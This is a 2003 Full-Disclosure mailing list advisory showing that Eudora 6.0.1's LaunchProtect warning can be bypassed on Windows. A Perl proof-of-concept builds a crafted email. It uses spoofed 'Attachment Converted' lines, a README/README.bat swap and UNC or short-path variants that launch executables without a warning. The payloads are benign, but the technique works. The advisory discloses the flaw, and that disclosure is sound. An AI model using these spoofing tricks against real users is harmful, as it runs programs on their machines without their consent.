[Full-Disclosure] Eudora 6.0.1 LaunchProtect
From: Paul Szabo (psz_at_maths.usyd.edu.au)
To: firstname.lastname@example.org, email@example.com, firstname.lastname@example.org Date: Tue, 25 Nov 2003 14:17:52 +1100 (EST)
Eudora 6.0.1 (on Windows) has LaunchProtect, to warn the user before
running executable attachments. However this only works in the attach
folder; using spoofed attachments, executables stored elsewhere may run
without warning. In some setups, even executables in the attach folder
may run without warning.
Harmless demo below.
Paul Szabo - email@example.com http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics University of Sydney 2006 Australia
--- #!/usr/bin/perl -- use MIME::Base64; print "From: me\n"; print "To: you\n"; print "Subject: Eudora 6.0.1 on Windows spoof, LaunchProtect\n"; print "\n"; print "Pipe the output of this script into: sendmail -i victim\n"; print " Eudora 6.0.1 LaunchProtect handles the X-X.exe dichotomy in the attach directory only, and allows spoofed attachments pointing to an executable stored elsewhere to run without warning:\n"; print "Attachment Converted\r: <a href=c:/winnt/system32/calc>go.txt</a>\n"; print "Attachment Converted\r: c:/winnt/system32/calc\n"; $X = 'README'; $Y = "$X.bat"; print "\nThe X - X.exe dichotomy: send a plain $X attachment:\n"; $z = "rem Funny joke\r\npause\r\n"; print "begin 600 $X\n", pack('u',$z), "`\nend\n"; print "\nand (in another message or) after some blurb so is scrolled off in another screenful, also send $Y. Clicking on $X does not get it any more (but gets $Y, with a LauchProtect warning):\n"; $z = "rem Big joke\r\nrem Should do something nasty\r\npause\r\n"; print "begin 600 $Y\n", pack('u',$z), "`\nend\n"; print " Can be exploited if there is more than one way into attach: in my setup H: and \\\\rome\\home are the same thing, but Eudora does not know that.\n"; print "These elicit warnings:\n"; print "Attachment Converted\r: <a href=h:/eudora/attach/README>readme</a>\n"; print "Attachment Converted\r: h:/eudora/attach/README\n"; print "while these do the bad thing without warning:\n"; print "Attachment Converted\r: <a href=file://rome/home/eudora/attach/README>readme</a>\n"; print "Attachment Converted\r: //rome/home/eudora/attach/README\n"; print "Attachment Converted\r: \\\\rome\\home\\eudora\\attach\\README\n"; print " For the default setup, Eudora knows that C:\\Program Files and C:\\Progra~1 are the same thing...\n"; print "Attachment Converted\r: \"c:/program files/qualcomm/eudora/attach/README\"\n"; print "Attachment Converted\r: \"c:/progra~1/qualcomm/eudora/attach/README\"\n"; print "\n"; _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html